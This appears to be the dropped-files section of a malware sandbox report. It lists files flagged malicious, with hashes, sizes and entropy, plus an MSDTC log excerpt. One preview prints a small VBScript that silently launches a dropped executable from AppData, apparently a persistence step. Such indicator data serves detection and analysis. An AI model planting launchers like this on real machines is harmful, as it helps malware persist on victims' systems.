                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.032386569781628
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:BAMsOu3JfCIGnZuTodRFYKBrFDbWp7Dmg27RnWGj:BAMa38ZuTSeD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2A4EC22AB9CAB34E0E4FDEBD50F0FE70
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F536EB7556BADBE477CB6136F1BCCA6096BFB4AB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EE8900B395B6E290D67196151E18DC1C2F551760E47F1A6DCFAC0E4BD410C40
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0755EC588F34B4B16F3F1F70A4388DD80EE5CF8A681D66DC91B8CE10A09F1472C884C5AF406BCD82AE91EED30A8E2D9BC5903AC8551E7DD76FB5819B996D516C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.104330390446351
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:0wbK7tnhD4aH6wD2Krx5NgOOagQE8JDsqjnhMgeiCl7G0nehbGZpbD:0SK7Fhslq2EPfOGEKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50D10D902E19A60EA604F44F2E2409A8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9D4B9203351E9768BA9D696E506D117E4E501D7A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBD0CAB8C3DCF251F011ECD8C8DE1D843A4029C62E7D163A760514B3FEBEC5E6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D69B6EEC69D158EDF91B49403545124BF3C895E64CB7CEDC4C6CE47E3CA83AE126AAF8BCBBF872B4DB7F4E9AB134A694E165386EBC0C5F34870E4987E64FBD97
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1580603115145545
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RKI7Twj5KDHxJ1FxyD+/wsG18bbQzsqjnhMgeiCl7G0nehbGZpbD:Rv7e0j31mD+/wDGbwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3619955C035517FFBD3560F6E89F971
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:523F72F9F9EA923C2F59B5AEC3B04C1E727AB9FB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C10EC087F0FC528E2B63073849DF7248152F2DD7547F7808C929FED6D87321B1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA0C4868FA5C20DC06294241D57F07777A94333701BD42C350FE256329EF55AF13FAD3529B3A83489ECFF349F8A84914AFC7F9B5F5F580B9A252A5EB31FA424F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.377409159333965
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wQUVPDHhSwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:TyhSwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:63216F380DE829D3807B6E8EBF7F3910
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AC2FB05FC4F6F8798DCDDF3CCC5FD5DD54A3A2A0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5AD4464C0006DF640AD6B6DB4D5FF46E2A320AE775DCF94A8FBB8DC0C14142EC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B62B73284E48082AB2AF97F5A4D0B8B6D130EEC12509253582D45962811CF24BEA331565E107E6AE3DFF1DF4320158D2F1067C49D9C3015E5588B98841B3F07C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.222101790030088
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:LsFfc1VyFn5UQn652bO4HLsqjnhMgeiCl7G0nehbGZpbD:LsFcIn5rJ5Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AA7616A4074AC0735D68DF4C39B2A444
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:96F4E507612008B5CD2CC0821632D079C2FD86BB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:996B433AE1866ADDAB3148A607F979721A1A5FF1EEE1EDD106E0DF59433E0EED
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:37837B78F7CAB35E5EAD92728C29DFB95BA7E0173AD115D6352D859F222C3A0FC65528FB11867AA46772532D8947459E6BC026CA863ABBC0D13FF8E94180512D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.49426801002435
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:1t9o6p4xQbiKI69wpemIwpel98sqjnhMgeiCl7G0nehbGZpbD:1t9faQbtl2peapelCDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1A0143A36145CB1E658BB441CA2B2E58
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F22FCE0A93BD0EA9A64A12E19EFCCC42715F94F6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:37E48496A5D4ADC4CAA0B85B79C72FAD9FF94B6EFBF4FC16BBE19D48F097283A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F15A1DCD68A169E974757D3E56E0822A5539E549191FF832CE1D95F7D7616E344F7A70361B298CC960E20A172E3CDB6561F91EFC9798D1489FB3FFE9C96900A8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.34781386899821
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:8QVTZu0JzsqjnhMgeiCl7G0nehbGZpbD:TVTZuyDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:12F61F9523F9F4F4D33E190AC66E4E5E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED2F5E0F704D973F54083163B7844A4684BACAFF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6089109508BD9BCDFFC1579FAFF0D1CA3576C60117E3220DD2DEE997C21FF5E3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CE2A8009A47A69E4BF3522DCDF0AC1717056335142701B2DD6E3ECFB44DE7211E827893E6FB8520A112F1647F7A32F0F9B30D02584CA5A3CD9F1160378EC79F8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.808347232720817
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:KC1vpgXcZHz1sqjnhMgeiCl7G0nehbGZpbD:KC1vpIcNpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D680A045B455459DD3F5B794D0B7527
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:66A06A3D4A6DA2BE2ED6B6A78889A5E69E02EC29
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BF567F91FBE860BFD355CCE9D67B72FCC5F969AB3B62F6474D2E6793BFB54827
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8B3F51196FCA89D253763850C46650B0731A7B07935296AE48FC757C72CF68E7EB7C7E2D9274B66C9858A6B98F88CBE36B22160C2794E30F9168410A7A43382
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139991025616543
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
Malicious:true
Reputation:unknown

Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1408512
Entropy (8bit):5.4411213803170675
Encrypted:false
Malicious:true
Reputation:unknown

Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1185280
Entropy (8bit):5.103246805120972
Encrypted:false
Malicious:true
Reputation:unknown

Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1531904
Entropy (8bit):5.421184095822541
Encrypted:false
Malicious:true
Reputation:unknown

Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1341952
Entropy (8bit):5.238571604949466
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1534464
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1246007044976185
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:xSEmYD6gjGPG45QVDkfXplyTyTsqjnhMgeiCl7G0nehbGZpbD:x5mYD6g2GWQVQf3yT8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BA5476495D830BDE224A67410DFD3931
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04646A07E89F9E7B55871EA8D3ACF7C598F6BAA6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:060E3637AF548A1B6DBA786372B06B19411CC4E27072DB0E776A4BE73BABC788
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1CDDCD96119BF924E7B186EEE20598CC2A7E5130C6BBF593903BFA498DD55145B1DDB7FB95F490B9E20EAF470A7F6805B606891ADEFBACE34917DB3F7316E228
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1622016
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.09278309438509
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:SZiGPNoWEa221SKHbFGXiUz2/zFWHnXa7hxJMHqAFjW7r:Fd8p5VUz2/BMwxCHlFg
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:991105A1FA983A769B94E9FB0B4168EE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:95C0651BA299E3933C632AF501FF0C07FFCC800D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6B7641C0FF8D2455C095EC6B3F37B65E05A55359416FEF0B42C906AA3D72FAD6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C79D5AF6CF6A1F548F6A174FF1DD7AD4F2179085D8D172B88E180D9C747E44D19EE9B357F1D8AFC410178BFBEB66EA2CB56E431E29A452FEA84A0E6934E3A49
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3101805
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.874408377679067
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:7JZoQrbTFZY1iaCt55r1KX4wtxCliwzlGWm4FjNLlX1USl6G5tCaOOplYEawVubA:7trbTA1YKowvCrzkWm4Z3Ffl6+C8pXao
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6BF724C582F4467FB4D87108744CAFBDBD1169B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:35A056CC53702FD3C3D9F0624EADAE17B0E00AC7F18FFD50B6A708CC27183441
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6DD9869686DFB6003A974E2130DF1843E0FC78D31A8A246A6685192140D47B06A85483C47C4DF01C56FAD1D0EAE8669E0B1BEFC47912446073E411FC16F079ED
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.987892708617986
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:cEOpgsxCRCex0s9YPN3/rW3rsTugVcrIXIhY6xmSDBtKvpoxcR9b2OY8urYm:c3pgsxCRL9YPNCQFCMkDBtiSxc2NTMm
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A3A0C6F4369A58D3DF2C5422C2051427
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FF59072B5E9FAF4872FC2F21C2E4813A7A5600F5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:623E843214F5C7395957771F9C6E285366277EE6027CA7795AD71B8EBCC92DEC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8DC2F34B7031D9C67123027E38DB7D857D312409B52DEB45A4713C1AAAF7E58567D442EA4BE67DFBAC7042023F6BB49C4103275538E3AC81E8B3F1A538D6F19
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):268
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4209455304240626
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNloRKQ1A1z4mA2n
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3A871A22DFC23DD6763F6002299B13A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B7934BFD389FE7FBDC08710EDABA4C16D3EED618
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FEA868420602CDAF96C19BE169F6BA44178494DB3B8F6292DCD7B8A8BB194F66
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6166B8A0DED88F7C8F3CC1D92A44A0A112B4CFCBEEB3934005E89B32614C79BB7F7ABDBF8CF84D90D4864C425460673739935562B344AE14FFE1076F5D0F7CA9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\jones\AppData\Local\directory\name.exe", 1
Set WshShell = Nothing
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.133697751555109
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786e:Z070s0Y0q0mF7Dm5x
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04987D3EEAB6F4C0EB5FF7E23FC5B4E1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4887B45FF88DC6BE78CBEA527BE5841D40E39FCD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:67EE0B77D9AE564BD89BE745991937A4ECB531D4CD3F45E7B0C54D46389D860F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:73FE8526D4AFA7C65AC91C43923D552AB434069D11DEEC5BBA2F7D75EA68E16B64D0BEB67F8368E146BCC97BFA5843FDCB20C266A4DC643C971841AD6D9D2DD6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "-\303z{"
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9470711344088716
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:QzA/isLTOUpVkhPYPIBsssPSsuEEatV/7PiP7PcPxYMANa9RRtdJdEbb:x/isFIHuTEgfZJw
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BBB2BDCC16A5D5F290D8767984A5A842
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F5D6B349217B3AF321F2E971EA2E96F097C92C61
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5B749615E3683292F6962846BB691701A69DEBF48F06CF9B5B3C9C2545E5B9D4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:361A77185EF12D90EA182759E40D12439915A5F86871EC6B066C8A71F0B5F370B5B836A8A15CF839A93D401E894D7BE34D6C6FF892A3B8B2073949FEDC37014F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1150976
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.038884296862169
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:SGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39B7A38B4D293A74193E0AFFD1CF7BBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FB749DB9B7A693C9D4C637B5D58003B835CBC7A1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B10815097808176D53FE97C1FEE51246EB34B369FC983484B978B1542AF2F208
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:627C58B9F0ECEC613ED6A53189C4F6371908FCD7BD9C9B2A306E1D5BC5E4C81C476B52FA0D4346F2A112A2389648CDE812ED1679F3D0925BB7232C95911B0BAA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.974317758912734
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:0wVFr68Vw9wn/6h8N1zidLDmg27RnWGj:0wVFrssC/dLD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:085BAFAFBBA6343A8BA8B383CB55A16F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:71EC90FD657CB2EED500E52FCDEB665EE1BDE326
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BA178F45F296265EC96EB6C596809642FA630DFB03C0318821C4270425FB64E2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BB97067B33CA3F4941397FE8A050CE7DD203F228ED1EFFB143A3E857C75F8E86DC061DBC9314BA657FBA56DF1F5C82129A433FD5ED3B25CF77D41CEE4292A8FA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.253735440401379
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:TQW4qoNUgslKNX0Ip0MgHCpoMBOuOsqjnhMgeiCl7G0nehbGZpbD:TQW9BKNX0IPgiKMBOuiDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CE73AC0BEBC9815C9D34668A399D261C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4E6BFABC9B472505D9EB28E33678EDEE73136724
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A9D39836069333890A0DEEA7353A57D17256EF3B3A0BD1B69CB34A44863BA49B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CCAB904A26866E3895E307D0078E7F29E41F0FE0C6377F4BEDCA7B307CB6C3C82AA6EF2B078710903BAA89D7DE8422B8AAFA589373054E3405B030841DCE1FDF
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1635290193532555
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:X2G7AbHjklsqjnhMgeiCl7G0nehbGZpbD:X2G7AbHjUDmg27RnWGj
